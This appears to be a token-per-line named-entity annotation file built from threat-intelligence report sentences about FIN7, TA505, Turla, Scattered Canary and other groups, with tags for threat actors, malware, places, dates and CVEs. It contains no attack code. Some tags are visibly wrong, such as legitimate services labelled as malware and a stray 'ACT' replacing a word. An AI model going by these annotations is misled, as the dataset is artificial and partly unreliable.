+, O
+FIN7 S-APT
+on O
+its O
+GRIFFON O
+C2s O
+before O
+January B-TIME
+2018 E-TIME
+, O
+and O
+Cobalt O
+, O
+on O
+its O
+staging O
+servers O
+, O
+similar O
+to O
+CopyPaste O
+. O
+Quite O
+recently O
+, O
+FIN7 S-APT
+threat O
+actors O
+typosquatted O
+the O
+brand O
+Digicert” S-IDTY
+using O
+the O
+domain O
+name O
+digicert-cdn[.]com O
+, O
+which O
+is O
+used O
+as O
+a O
+command S-MAL
+and O
+control B-MAL
+server E-MAL
+for O
+their O
+GRIFFON O
+implants O
+. O
+The O
+first O
+of O
+them O
+is O
+the O
+well-known O
+FIN7 S-APT
+, O
+which O
+specializes O
+in O
+attacking O
+various B-IDTY
+companies E-IDTY
+to O
+get O
+access O
+to O
+financial S-IDTY
+data O
+or O
+PoS O
+infrastructure O
+. O
+The O
+second O
+one O
+is O
+CobaltGoblin S-APT
+Carbanak S-APT
+EmpireMonkey S-APT
+, O
+which O
+uses O
+the O
+same O
+toolkit O
+, O
+techniques O
+and O
+similar O
+infrastructure O
+but O
+targets O
+only O
+financial S-IDTY
+institutions O
+and O
+associated O
+software/services O
+providers O
+. O
+we O
+observe O
+, O
+with O
+various O
+level O
+of O
+confidence O
+, O
+that O
+there O
+are O
+several O
+interconnected O
+groups S-APT
+using O
+very O
+similar B-MAL
+toolkits E-MAL
+and O
+the O
+same O
+infrastructure S-MAL
+to O
+conduct O
+their O
+cyberattacks O
+. O
+The O
+last O
+piece O
+is O
+the O
+newly O
+discovered O
+CopyPaste S-APT
+group O
+, O
+who O
+targeted O
+financial S-IDTY
+entities O
+and O
+companies S-IDTY
+in O
+one O
+African S-LOC
+country O
+, O
+which O
+lead O
+us O
+to O
+think O
+that O
+CopyPaste O
+was O
+associated O
+with O
+cybermercenaries O
+or O
+a O
+training B-IDTY
+center E-IDTY
+. O
+At O
+the O
+end B-TIME
+of I-TIME
+2018 E-TIME
+, O
+the O
+cluster S-APT
+started O
+to O
+use O
+not O
+only O
+CobaltStrike S-MAL
+but O
+also O
+Powershell S-MAL
+Empire O
+in O
+order O
+to O
+gain O
+a O
+foothold O
+on O
+the O
+victims’ O
+networks O
+. O
+FIN7 S-APT
+thus O
+continues O
+to O
+use O
+effective O
+spearphishing S-ACT
+campaigns O
+in O
+conjunction O
+with O
+well-known O
+MS O
+Office O
+exploits O
+generated O
+by O
+the O
+framework O
+. O
+MuddyWater S-APT
+is O
+widely O
+regarded O
+as O
+a O
+long-lived O
+APT O
+group O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+From O
+February O
+to O
+April B-TIME
+2019 E-TIME
+, O
+MuddyWater S-APT
+launched O
+a O
+series O
+of O
+spear-phishing S-ACT
+attacks O
+against O
+governments S-IDTY
+, O
+educational B-IDTY
+institutions E-IDTY
+, O
+financial S-IDTY
+, O
+telecommunications S-IDTY
+and O
+defense S-IDTY
+companies O
+in O
+Turkey S-LOC
+, O
+Iran S-LOC
+, O
+Afghanistan S-LOC
+, O
+Iraq S-LOC
+, O
+Tajikistan S-LOC
+and O
+Azerbaijan S-LOC
+. O
+FIN7 S-APT
+thus O
+continue O
+to O
+use O
+effective O
+spearphishing S-ACT
+campaigns O
+in O
+conjunction O
+with O
+well-known O
+MS O
+Office O
+exploits O
+generated O
+by O
+the O
+framework O
+. O
+We O
+also O
+unearthed O
+and O
+detailed O
+our O
+other O
+findings O
+on O
+MuddyWater S-APT
+, O
+such O
+as O
+its O
+connection O
+to O
+four O
+Android S-OS
+malware S-MAL
+variants O
+and O
+its O
+use O
+of O
+false O
+flag O
+techniques O
+, O
+among O
+others O
+, O
+in O
+our O
+report O
+New O
+MuddyWater O
+Activities O
+Uncovered: O
+Threat O
+Actors O
+Used O
+Multi-Stage B-MAL
+Backdoors E-MAL
+, O
+False B-MAL
+Flags E-MAL
+, O
+Android S-OS
+malware S-MAL
+, O
+and O
+More O
+. O
+Instead O
+, O
+the O
+campaign O
+used O
+compromised B-MAL
+legitimate I-MAL
+accounts E-MAL
+to O
+trick O
+victims O
+into O
+installing B-ACT
+malware E-ACT
+. O
+Notably O
+, O
+the O
+group’s S-APT
+use O
+of O
+email S-MAL
+as O
+infection O
+vector O
+seems O
+to O
+yield O
+success O
+for O
+their O
+campaigns S-ACT
+. O
+We O
+also O
+observed O
+MuddyWater’s S-APT
+use O
+of O
+multiple O
+open O
+source O
+post-exploitation B-MAL
+tools E-MAL
+, O
+which O
+they O
+deployed O
+after O
+successfully O
+compromising O
+a O
+target O
+. O
+The O
+attacker S-APT
+also O
+connected S-ACT
+to O
+the O
+compromised O
+servers O
+from O
+IP S-PROT
+addresses O
+that O
+were O
+linked O
+to O
+dynamic O
+domain O
+names O
+used O
+as O
+C&Cs O
+by O
+the O
+delivered B-MAL
+payloads E-MAL
+. O
+The O
+main O
+payload O
+is O
+usually O
+Imminent O
+Monitor B-FILE
+RAT E-FILE
+; O
+however O
+, O
+at O
+the O
+beginning B-TIME
+of I-TIME
+2018 E-TIME
+, O
+we O
+also O
+observed O
+the O
+use O
+of O
+LuminosityLink B-FILE
+RAT E-FILE
+, O
+NetWire B-FILE
+RAT E-FILE
+, O
+and O
+NjRAT S-FILE
+. O
+In O
+a O
+case O
+in O
+June B-TIME
+2019 E-TIME
+, O
+we O
+also O
+noticed O
+Warzone B-FILE
+RAT E-FILE
+being O
+used O
+. O
+Xpert B-FILE
+RAT E-FILE
+reportedly O
+first O
+appeared O
+in O
+2011 S-TIME
+. O
+The O
+first O
+version O
+of O
+Proyecto B-FILE
+RAT” E-FILE
+was O
+published O
+at O
+the O
+end O
+of O
+2010 S-TIME
+. O
+But O
+with O
+the O
+West O
+African S-LOC
+gang O
+we’ve O
+named O
+Scattered B-APT
+Canary E-APT
+, O
+we O
+have O
+a O
+deeper O
+look O
+at O
+how O
+business O
+email S-TOOL
+compromise O
+is O
+connected S-ACT
+to O
+the O
+rest O
+of O
+the O
+cybercrime O
+. O
+
+This O
+investigation O
+by O
+the O
+Agari B-SECTEAM
+Cyber I-SECTEAM
+Intelligence E-SECTEAM
+Division O
+into O
+the O
+cybercriminal O
+group O
+we’ve O
+named O
+Scattered B-APT
+Canary E-APT
+offers O
+unprecedented O
+visibility O
+into O
+eleven O
+years O
+of O
+fraud O
+and O
+criminal O
+activities O
+, O
+and O
+the O
+growth O
+of O
+a O
+419 O
+startup O
+into O
+a O
+fully O
+operational O
+BEC O
+business S-IDTY
+. O
+While O
+this O
+criminal O
+organization’s S-SECTEAM
+activities O
+now O
+center O
+around O
+BEC O
+, O
+and O
+extend O
+to O
+romance B-ACT
+scams E-ACT
+, O
+credit B-ACT
+card I-ACT
+fraud E-ACT
+, O
+check B-ACT
+fraud E-ACT
+, O
+fake B-ACT
+job E-ACT
+listings O
+, O
+credential B-ACT
+harvesting E-ACT
+, O
+tax B-ACT
+schemes E-ACT
+, O
+and O
+more O
+, O
+these O
+actors O
+came O
+from O
+much O
+humbler O
+beginnings O
+, O
+starting O
+with O
+basic O
+Craigslist O
+scams O
+in O
+2008 S-TIME
+. O
+On O
+November B-TIME
+29 E-TIME
+, O
+2018 S-TIME
+, O
+Scattered B-APT
+Canary E-APT
+sent O
+an O
+attack O
+email S-TOOL
+to O
+Agari O
+CFO O
+Raymond O
+Lim O
+, O
+enquiring O
+as O
+to O
+his O
+availability O
+to O
+send O
+out O
+a O
+domestic O
+wire O
+transfer O
+. O
+Many O
+feel O
+that O
+they O
+have O
+a O
+home O
+team O
+advantage O
+living O
+in O
+Nigeria S-LOC
+, O
+where O
+they S-APT
+are O
+free O
+to O
+pay O
+off O
+law O
+enforcement O
+to O
+look O
+the O
+other O
+ACT O
+. O
+Scattered B-APT
+Canary’s E-APT
+fraudulent O
+history O
+can O
+be O
+traced O
+as O
+far O
+back O
+as O
+October B-TIME
+2008 E-TIME
+, O
+when O
+the O
+group O
+first O
+arrived O
+on O
+the O
+cybercriminal O
+circuit O
+. O
+By O
+March B-TIME
+2016 E-TIME
+, O
+one O
+of O
+Scattered B-APT
+Canary’s E-APT
+members O
+had O
+built O
+enough O
+trust O
+with O
+a O
+romance O
+victim—who O
+we’ll O
+call O
+Jane—that O
+she O
+became O
+a O
+frequent O
+source O
+of O
+new O
+mule O
+accounts O
+for O
+the O
+group O
+. O
+Alpha’s S-APT
+early O
+role O
+was O
+fairly O
+simple: O
+engage O
+with O
+individuals O
+, O
+who O
+he O
+chose O
+based O
+on O
+the O
+goods O
+they O
+were O
+selling O
+, O
+and O
+then O
+provide O
+personal O
+shipping O
+addresses O
+back O
+to O
+Omega O
+. O
+By O
+all O
+accounts O
+, O
+late B-TIME
+2015 E-TIME
+was O
+the O
+beginning O
+of O
+BEC O
+for O
+Scattered B-APT
+Canary E-APT
+. O
+The O
+first O
+type O
+of O
+attack O
+Scattered B-APT
+Canary E-APT
+pivoted O
+to O
+was O
+credential B-ACT
+phishing E-ACT
+. O
+Between O
+July B-TIME
+2015 E-TIME
+and O
+February B-TIME
+2016 E-TIME
+, O
+Scattered B-APT
+Canary’s E-APT
+primary O
+focus O
+seemed O
+to O
+be O
+mass O
+harvesting O
+general O
+credentials O
+using O
+a O
+Google O
+Docs O
+phishing S-ACT
+page O
+. O
+In O
+the O
+first O
+few O
+months O
+of O
+their O
+credential O
+phishing S-ACT
+ventures O
+, O
+Scattered B-APT
+Canary’s E-APT
+sights O
+were O
+mostly O
+set O
+on O
+Asian S-LOC
+targets—Malaysia S-LOC
+and O
+Japan S-LOC
+, O
+in O
+particular O
+. O
+In O
+November B-TIME
+2015 E-TIME
+, O
+the O
+group O
+started O
+to O
+focus O
+on O
+North B-LOC
+American E-LOC
+users O
+, O
+mostly O
+in O
+the O
+United B-LOC
+States E-LOC
+. O
+This O
+activity O
+ceased O
+in O
+February B-TIME
+2016 E-TIME
+, O
+likely O
+because O
+the O
+men O
+who O
+made O
+up O
+Scattered B-APT
+Canary E-APT
+began O
+to O
+focus O
+on O
+honing O
+their O
+BEC O
+skills O
+. O
+
+In O
+total O
+, O
+Scattered B-APT
+Canary E-APT
+received O
+more O
+than O
+3 O
+, O
+000 O
+account O
+credentials O
+as O
+a O
+result O
+of O
+their O
+phishing S-ACT
+attacks O
+. O
+For O
+over O
+eighteen O
+months O
+from O
+March B-TIME
+2017 E-TIME
+until O
+November B-TIME
+2018 E-TIME
+, O
+Scattered B-APT
+Canary’s E-APT
+frequent O
+enterprise-focused O
+credential O
+phishing B-ACT
+campaigns E-ACT
+almost O
+exclusively O
+targeted O
+businesses O
+in O
+the B-LOC
+United I-LOC
+States E-LOC
+and O
+Canada S-LOC
+. O
+In O
+July B-TIME
+2018 E-TIME
+, O
+following O
+a O
+trend O
+we O
+have O
+observed O
+across O
+the O
+entire O
+BEC O
+threat O
+landscape O
+, O
+Scattered B-APT
+Canary E-APT
+changed O
+their O
+preferred O
+cash O
+out O
+mechanism O
+from O
+wire O
+transfers O
+to O
+gift O
+cards O
+. O
+Instead O
+of O
+using O
+fake O
+Google O
+Docs O
+phishing S-ACT
+pages O
+to O
+collect O
+personal O
+email S-TOOL
+login O
+credentials O
+, O
+Scattered B-APT
+Canary E-APT
+began O
+using O
+phishing S-ACT
+pages O
+of O
+commonly O
+used O
+business O
+applications O
+to O
+compromise O
+enterprise O
+credentials O
+. O
+Using O
+personal O
+information O
+obtained O
+from O
+various O
+sources O
+, O
+Scattered B-APT
+Canary E-APT
+started O
+perpetrating O
+fraud O
+against O
+US S-LOC
+federal O
+and O
+state B-IDTY
+government I-IDTY
+agencies E-IDTY
+. O
+In O
+total O
+, O
+35 O
+actors O
+have O
+been O
+tied O
+to O
+Scattered B-APT
+Canary’s E-APT
+operations O
+since O
+the O
+group O
+emerged O
+in O
+2008 S-TIME
+. O
+Just O
+as O
+with O
+romance O
+scams O
+, O
+actors S-APT
+make O
+use O
+of O
+scripts S-MAL
+and O
+templates S-MAL
+they O
+can O
+copy-and-paste O
+without O
+having O
+to O
+create O
+something O
+on O
+their O
+own O
+. O
+When O
+it O
+comes O
+to O
+engaging O
+targets O
+, O
+Scattered B-APT
+Canary E-APT
+frequently O
+maximized O
+efficiencies O
+through O
+the O
+use O
+of O
+scripts O
+, O
+or O
+as O
+some O
+members O
+of O
+the O
+group O
+call O
+them O
+, O
+formats.” O
+These O
+formats O
+are O
+templated O
+text O
+documents O
+that O
+can O
+contain O
+several O
+layers O
+of O
+phishing S-ACT
+messages O
+to O
+send O
+to O
+potential O
+victims O
+. O
+Recently O
+, O
+we O
+unveiled O
+the O
+existence O
+of O
+a O
+UEFI O
+rootkit O
+, O
+called O
+LoJax S-MAL
+, O
+which O
+we O
+attribute O
+to O
+the O
+Sednit S-APT
+group O
+. O
+If O
+Scattered B-APT
+Canary E-APT
+can O
+be O
+seen O
+as O
+a O
+microcosm O
+for O
+the O
+rapidly O
+evolving O
+organizations O
+behind O
+today’s O
+most O
+pernicious O
+email B-ACT
+scams E-ACT
+, O
+this O
+report O
+demonstrates O
+that O
+a O
+much O
+more O
+holistic O
+approach—one O
+based O
+on O
+threat O
+actor O
+identity O
+rather O
+than O
+type O
+of O
+fraudulent O
+activity—is O
+required O
+to O
+detect O
+email S-TOOL
+fraud O
+and O
+protect O
+organizations O
+. O
+This O
+is O
+a O
+first O
+for O
+an O
+APT O
+group O
+, O
+and O
+shows O
+Sednit S-APT
+has O
+access O
+to O
+very O
+sophisticated B-MAL
+tools E-MAL
+to O
+conduct O
+its O
+espionage O
+operations O
+. O
+Three B-TIME
+years I-TIME
+ago E-TIME
+, O
+the O
+Sednit S-APT
+group O
+unleashed O
+new O
+components O
+targeting O
+victims O
+in O
+various O
+countries O
+in O
+the O
+Middle B-LOC
+East E-LOC
+and O
+Central B-LOC
+Asia E-LOC
+. O
+In O
+the O
+past O
+, O
+Sednit S-APT
+used O
+a O
+similar O
+technique O
+for O
+credential B-ACT
+phishing E-ACT
+. O
+At O
+the O
+end O
+of O
+August O
+2018 S-TIME
+, O
+the O
+Sednit O
+group O
+launched O
+a O
+spearphishing S-ACT
+email S-TOOL
+campaign O
+where O
+it O
+distributed O
+shortened O
+URLs O
+that O
+delivered O
+the O
+first O
+stage O
+of O
+Zebrocy O
+components O
+. O
+As O
+we O
+explained O
+in O
+our O
+most O
+recent O
+blogpost O
+about O
+Zebrocy S-APT
+, O
+the O
+configuration O
+of O
+the O
+backdoor S-MAL
+is O
+stored O
+in O
+in O
+the O
+resource O
+section O
+and O
+is O
+split O
+into O
+four O
+different O
+hex-encoded S-ENCR
+, O
+encrypted O
+blobs O
+. O
+The O
+past O
+iteration O
+of O
+SLUB S-APT
+spread O
+from O
+a O
+unique O
+watering B-ACT
+hole E-ACT
+website O
+exploiting O
+CVE-2018-8174 S-VULID
+, O
+a O
+VBScript O
+engine O
+vulnerability O
+. O
+It S-APT
+used O
+GitHub S-MAL
+and O
+Slack S-MAL
+as O
+tools O
+for O
+communication O
+between O
+the O
+malware O
+and O
+its O
+controller O
+. O
+On O
+July B-TIME
+9 E-TIME
+, O
+we O
+discovered O
+a O
+new O
+version O
+of O
+SLUB S-APT
+delivered O
+via O
+another O
+unique O
+watering B-ACT
+hole E-ACT
+website O
+. O
+This O
+malicious O
+site O
+used O
+CVE-2019-0752 S-VULID
+, O
+an O
+Internet O
+Explorer O
+vulnerability O
+discovered O
+by O
+Trend B-SECTEAM
+Micro’s I-SECTEAM
+Zero I-SECTEAM
+Day I-SECTEAM
+Initiative E-SECTEAM
+( O
+ZDI S-SECTEAM
+) O
+that O
+was O
+just O
+patched O
+this O
+April S-TIME
+. O
+
+Since O
+we O
+published O
+out O
+last O
+report O
+on O
+SLUB S-APT
+, O
+the O
+backdoor S-MAL
+has O
+been O
+updated O
+and O
+several O
+improvements O
+were O
+implemented O
+. O
+The O
+SLUB S-APT
+malware O
+was O
+delivered O
+through O
+watering O
+hole O
+websites O
+that O
+were O
+injected O
+with O
+exploits O
+for O
+CVE-2018-8174 S-VULID
+or O
+CVE-2019-0752 S-VULID
+. O
+During O
+this O
+attack O
+, O
+we O
+found O
+that O
+the O
+SLUB S-APT
+malware O
+used B-ACT
+two I-ACT
+Slack E-ACT
+teams O
+sales-yww9809” O
+and O
+marketing-pwx7789 O
+. O
+SWEED S-APT
+remains O
+consistent O
+across O
+most O
+of O
+their O
+campaigns O
+in O
+their O
+use O
+of O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+malicious O
+attachments O
+. O
+In O
+April B-TIME
+2018 E-TIME
+, O
+SWEED S-APT
+began O
+making O
+use O
+of O
+a O
+previously O
+disclosed O
+Office O
+exploit S-VULNAME
+. O
+In O
+May B-TIME
+2018 E-TIME
+, O
+campaigns O
+being O
+conducted O
+by O
+SWEED S-APT
+began O
+leveraging O
+another O
+vulnerability O
+in O
+Microsoft S-IDTY
+Office: O
+CVE-2017-11882 S-VULID
+, O
+a O
+remote O
+code O
+execution O
+bug O
+in O
+Microsoft S-IDTY
+Office O
+that O
+is O
+commonly O
+observed O
+being O
+leveraged O
+in O
+malicious O
+documents O
+used O
+in O
+commodity O
+malware O
+distribution O
+. O
+We O
+found O
+them S-APT
+targeting O
+countries O
+in O
+the O
+Middle B-LOC
+East E-LOC
+such O
+as O
+United B-LOC
+Arab I-LOC
+Emirates E-LOC
+and O
+Saudi B-LOC
+Arabia E-LOC
+, O
+as O
+well O
+as O
+other O
+countries O
+such O
+as O
+India S-LOC
+, O
+Japan S-LOC
+, O
+Argentina S-LOC
+, O
+the B-LOC
+Philippines E-LOC
+, O
+and O
+South B-LOC
+Korea E-LOC
+. O
+Similar O
+to O
+previous O
+campaigns O
+, O
+the O
+JAR S-FILE
+was O
+directly O
+attached O
+to O
+emails S-TOOL
+and O
+used O
+file O
+names O
+such O
+as O
+Order_2018.jar S-MAL
+. O
+Code O
+contained O
+inside O
+one O
+of O
+the O
+slides S-FILE
+triggers O
+an O
+exploit S-VULNAME
+for O
+CVE-2017-8759 S-VULID
+, O
+a O
+remote O
+code O
+execution O
+vulnerability O
+in O
+Microsoft B-TOOL
+.NET I-TOOL
+framework E-TOOL
+. O
+
+TA505 S-APT
+is O
+also O
+using O
+FlowerPippi S-MAL
+( O
+Backdoor.Win32.FLOWERPIPPI.A S-MAL
+) O
+, O
+a O
+new O
+backdoor S-MAL
+that O
+we O
+found O
+them O
+using O
+in O
+their O
+campaigns O
+against O
+targets O
+in O
+Japan S-LOC
+, O
+India S-LOC
+, O
+and O
+Argentina S-LOC
+. O
+TA505 S-APT
+targeted O
+Middle B-LOC
+Eastern E-LOC
+countries O
+in O
+a O
+June B-TIME
+11 E-TIME
+campaign O
+that O
+delivered O
+more O
+than O
+90% O
+of O
+the O
+total O
+spam O
+emails S-TOOL
+to O
+the O
+UAE S-LOC
+, O
+Saudi B-LOC
+Arabia E-LOC
+, O
+and O
+Morroco S-LOC
+. O
+It S-APT
+fetches O
+the O
+same O
+FlawedAmmyy B-ACT
+downloader E-ACT
+.msi O
+file O
+, O
+then O
+downloads O
+the O
+FlawedAmmyy B-MAL
+payload E-MAL
+. O
+TA505 S-APT
+used O
+Wizard B-MAL
+(.wiz) I-MAL
+files E-MAL
+in O
+this O
+campaign O
+, O
+with O
+FlawedAmmyy B-MAL
+RAT E-MAL
+as O
+the O
+final O
+payload O
+. O
+On O
+June B-TIME
+14 E-TIME
+, O
+we O
+saw O
+TA505’s S-APT
+campaign O
+still O
+targeting O
+UAE S-LOC
+with O
+similar O
+tactics O
+and O
+techniques O
+, O
+but O
+this O
+time O
+, O
+some O
+of O
+the O
+spam O
+emails S-TOOL
+were O
+delivered O
+via O
+the O
+Amadey B-MAL
+botnet E-MAL
+. O
+It S-APT
+later O
+delivered O
+an O
+information O
+stealer O
+named O
+EmailStealer S-MAL
+, O
+” O
+which O
+stolesimple B-PROT
+mail I-PROT
+transfer I-PROT
+protocol E-PROT
+(
+SMTP S-PROT
+) O
+credentials O
+and O
+email S-TOOL
+addresses O
+in O
+the O
+victim’s O
+machine O
+. O
+On O
+June B-TIME
+18 E-TIME
+, O
+the O
+majority O
+of O
+the O
+campaign’s S-ACT
+spam O
+emails S-TOOL
+were O
+sent O
+with O
+the O
+subject O
+, O
+Your O
+RAKBANK O
+Tax O
+Invoice O
+/ O
+Tax O
+Credit O
+Note” O
+or O
+Confirmation O
+. O
+This O
+campaign O
+used O
+the O
+abovementioned O
+.HTML S-TOOL
+file O
+, O
+malicious O
+Excel/Word S-TOOL
+document O
+VBA O
+macro S-MAL
+, O
+the O
+FlawedAmmyy B-MAL
+payload E-MAL
+, O
+and O
+Amadey S-MAL
+. O
+On O
+June B-TIME
+24 E-TIME
+, O
+we O
+found O
+another O
+campaign O
+targeting O
+Lebanon S-LOC
+with O
+the O
+ServHelper S-FILE
+malware O
+. O
+On O
+June B-TIME
+17 E-TIME
+, O
+we O
+observed O
+the O
+campaign’s S-ACT
+spam O
+emails S-TOOL
+delivering O
+malware-embedded O
+Excel O
+files O
+directly O
+as O
+an O
+attachment O
+. O
+On O
+June B-TIME
+20 E-TIME
+, O
+we O
+spotted O
+the O
+campaign’s O
+spam O
+emails S-TOOL
+delivering O
+.doc O
+and O
+.xls O
+files O
+. O
+Nonetheless O
+, O
+these O
+spam B-FILE
+emails E-FILE
+were O
+not O
+delivered O
+to O
+the O
+UAE S-LOC
+or O
+Arabic-speaking S-LOC
+users O
+, O
+but O
+to O
+banks S-IDTY
+in O
+Asian S-LOC
+countries O
+such O
+as O
+India S-LOC
+, O
+Indonesia S-LOC
+, O
+and O
+the B-LOC
+Philippines E-LOC
+. O
+After O
+our O
+analysis O
+, O
+we O
+found O
+that O
+Proofpoint S-SECTEAM
+reported O
+this O
+malware O
+as O
+AndroMut S-APT
+as O
+well O
+. O
+In O
+the O
+campaign O
+that O
+targeted O
+Japan S-LOC
+, O
+Philippines S-LOC
+, O
+and O
+Argentina S-LOC
+on O
+June B-TIME
+20 E-TIME
+, O
+we O
+found O
+what O
+seems O
+to O
+be O
+a O
+new O
+, O
+undisclosed O
+malware O
+, O
+which O
+we O
+named O
+Gelup S-FILE
+. O
+Another O
+new O
+malware O
+we O
+found O
+that O
+TA505 S-APT
+is O
+using O
+in O
+their O
+campaigns O
+last O
+June B-TIME
+20 E-TIME
+against O
+targets O
+in O
+Japan S-LOC
+, O
+the O
+Philippines S-LOC
+, O
+and O
+Argentina S-LOC
+is O
+FlowerPippi S-MAL
+. O
+The O
+malicious O
+email S-TOOL
+contains O
+a O
+highly O
+suspicious O
+sample O
+which O
+triggered O
+the O
+ZLAB S-SECTEAM
+team O
+to O
+investigate O
+its O
+capabilities O
+and O
+its O
+possible O
+attribution O
+, O
+discovering O
+a O
+potential O
+expansion O
+of O
+the O
+TA505 S-APT
+operation O
+. O
+The O
+attack O
+, O
+as O
+stated O
+by O
+CyberInt O
+, O
+leveraged O
+a O
+command O
+and O
+control O
+server O
+located O
+in O
+Germany S-LOC
+related O
+to O
+the O
+TA505 S-APT
+actor: O
+a O
+very O
+active O
+group O
+involved O
+in O
+cyber-criminal O
+operation O
+all O
+around O
+the O
+world O
+, O
+threatening O
+a O
+wide O
+range O
+of O
+high B-IDTY
+profile I-IDTY
+companies E-IDTY
+, O
+active O
+since O
+2014 S-TIME
+. O
+The O
+comparison O
+of O
+the O
+infection O
+chains O
+reveals O
+in O
+both O
+cases O
+TA505 S-APT
+used O
+a O
+couple O
+of O
+SFX O
+stages O
+to O
+deploy B-ACT
+the I-ACT
+RMS” E-ACT
+software: O
+a O
+legitimate O
+remote B-MAL
+administration I-MAL
+tool E-MAL
+produced O
+by O
+the O
+Russian S-LOC
+company O
+TektonIT O
+. O
+The O
+TA505 S-APT
+group O
+is O
+one O
+of O
+the O
+most O
+active O
+threat O
+groups O
+operating O
+since O
+2014 S-TIME
+, O
+it O
+has O
+traditionally O
+targeted O
+Banking S-IDTY
+and O
+Retail S-IDTY
+industries O
+, O
+as O
+we O
+recently O
+documented O
+during O
+the O
+analysis O
+of O
+the O
+Stealthy O
+email S-TOOL
+Stealer” O
+part O
+of O
+their O
+arsenal O
+. O
+Also O
+, O
+some O
+code O
+pieces O
+are O
+directly O
+re-used O
+in O
+the O
+analyzed O
+campaigns O
+, O
+such O
+as O
+the O
+i.cmd” S-FILE
+and O
+exit.exe” S-FILE
+files O
+, O
+and O
+, O
+at O
+the O
+same O
+time O
+, O
+some O
+new O
+components O
+have O
+been O
+introduced O
+, O
+for O
+instance O
+the O
+rtegre.exe” S-FILE
+and O
+the O
+veter1605_MAPS_10cr0.exe” S-FILE
+file O
+. O
+In O
+2018 S-TIME
+, O
+Kaspersky S-SECTEAM
+Labs O
+published O
+a O
+report O
+that O
+analyzed O
+a O
+Turla S-APT
+PowerShell B-MAL
+loader E-MAL
+that O
+was O
+based O
+on O
+the O
+open-source O
+project O
+Posh-SecMod O
+. O
+Turla S-APT
+is O
+believed O
+to O
+have O
+been O
+operating O
+since O
+at O
+least O
+2008 S-TIME
+, O
+when O
+it O
+successfully O
+breached O
+the O
+US O
+military S-IDTY
+. O
+This O
+is O
+not O
+the O
+first O
+time O
+Turla S-APT
+has O
+used O
+PowerShell S-MAL
+in-memory O
+loaders O
+to O
+increase O
+its O
+chances O
+of O
+bypassing O
+security O
+products O
+. O
+However O
+, O
+it O
+is O
+likely O
+the O
+same O
+scripts O
+are O
+used O
+more O
+globally O
+against O
+many O
+traditional O
+Turla S-APT
+targets O
+in O
+Western B-LOC
+Europe E-LOC
+and O
+the O
+Middle B-LOC
+East E-LOC
+. O
+In O
+some O
+samples O
+deployed O
+since O
+March B-TIME
+2019 E-TIME
+, O
+Turla S-APT
+developers O
+modified O
+their O
+PowerShell S-TOOL
+scripts O
+in O
+order O
+to O
+bypass O
+the O
+Antimalware B-TOOL
+Scan I-TOOL
+Interface E-TOOL
+( O
+AMSI S-TOOL
+) O
+. O
+
+Based O
+on O
+our O
+research O
+, O
+SWEED S-APT
+— O
+which O
+has O
+been O
+operating O
+since O
+at O
+least O
+2017 S-TIME
+— O
+primarily O
+targets O
+their O
+victims O
+with O
+stealers O
+and O
+remote O
+access O
+trojans O
+. O
+It O
+is O
+interesting O
+to O
+note O
+that O
+Turla S-APT
+operators O
+used O
+the O
+free O
+email S-TOOL
+provider O
+GMX O
+again O
+, O
+as O
+in O
+the O
+Outlook B-MAL
+Backdoor E-MAL
+and O
+in O
+LightNeuron S-MAL
+. O
+This O
+new O
+research O
+confirms O
+our O
+forecast O
+and O
+shows O
+that O
+the O
+Turla S-APT
+group O
+does O
+not O
+hesitate O
+to O
+use O
+open-source O
+pen-testing O
+frameworks S-MAL
+to O
+conduct O
+intrusion O
+. O
+Neptun S-FILE
+is O
+installed O
+on O
+Microsoft S-IDTY
+Exchange O
+servers O
+and O
+is O
+designed O
+to O
+passively O
+listen O
+for O
+commands O
+from O
+the O
+attackers S-APT
+. O
+One O
+attack O
+during O
+this O
+campaign O
+involved O
+the O
+use O
+of O
+infrastructure O
+belonging O
+to O
+another O
+espionage O
+group O
+known O
+as O
+Crambus S-APT
+aka O
+OilRig S-APT
+, O
+APT34 S-APT
+. O
+Waterbug S-APT
+has O
+been O
+using O
+Meterpreter S-MAL
+since O
+at O
+least O
+early B-TIME
+2018 E-TIME
+and O
+, O
+in O
+this O
+campaign O
+, O
+used O
+a O
+modified O
+version O
+of O
+Meterpreter S-MAL
+, O
+which O
+was O
+encoded O
+and O
+given O
+a O
+.wav O
+extension O
+in O
+order O
+to O
+disguise O
+its O
+true O
+purpose O
+. O
+In O
+all O
+likelihood O
+, O
+Waterbug’s S-APT
+use O
+of O
+Crambus B-MAL
+infrastructure E-MAL
+appears O
+to O
+have O
+been O
+a O
+hostile O
+takeover O
+. O
+One O
+of O
+the O
+most O
+interesting O
+things O
+to O
+occur O
+during O
+one O
+of O
+Waterbug’s S-APT
+recent O
+campaigns O
+was O
+that O
+during O
+an O
+attack O
+against O
+one O
+target O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+Waterbug S-APT
+appeared O
+to O
+hijack O
+infrastructure O
+from O
+the O
+Crambus O
+espionage O
+group O
+and O
+used O
+it O
+to O
+deliver O
+malware O
+on O
+to O
+the O
+victim’s O
+network O
+. O
+These O
+three O
+recent O
+Waterbug S-APT
+campaigns O
+have O
+seen O
+the O
+group O
+compromise B-IDTY
+governments E-IDTY
+and O
+international B-IDTY
+organizations E-IDTY
+across O
+the O
+globe O
+in O
+addition O
+to O
+targets O
+in O
+the O
+IT S-IDTY
+and O
+education B-IDTY
+sectors E-IDTY
+. O
+Curiously O
+though O
+, O
+Waterbug S-APT
+also O
+compromised O
+other O
+computers O
+on O
+the O
+victim’s O
+network O
+using O
+its O
+own O
+infrastructure S-IDTY
+. O
+Symantec S-SECTEAM
+believes O
+that O
+the O
+variant O
+of O
+Mimikatz S-MAL
+used O
+in O
+this O
+attack O
+is O
+unique O
+to O
+Waterbug S-APT
+. O
+Aside O
+from O
+the O
+attack O
+involving O
+Crambus O
+infrastructure O
+, O
+this O
+sample O
+of O
+Mimikatz S-MAL
+has O
+only O
+been O
+seen O
+used O
+in O
+one O
+other O
+attack O
+, O
+against O
+an O
+education S-IDTY
+target O
+in O
+the O
+UK S-LOC
+in O
+2017 S-TIME
+. O
+The O
+first O
+observed O
+evidence O
+of O
+Waterbug S-APT
+activity O
+came O
+on O
+January B-TIME
+11 E-TIME
+, O
+2018 S-TIME
+, O
+when O
+a O
+Waterbug-linked O
+tool O
+(a O
+task O
+scheduler O
+named O
+msfgi.exe S-FILE
+) O
+was O
+dropped O
+on O
+to O
+a O
+computer O
+on O
+the O
+victim’s O
+network O
+. O
+In O
+the O
+case O
+of O
+the O
+attack O
+against O
+the O
+Middle B-LOC
+Eastern E-LOC
+target O
+, O
+Crambus S-APT
+was O
+the O
+first O
+group O
+to O
+compromise O
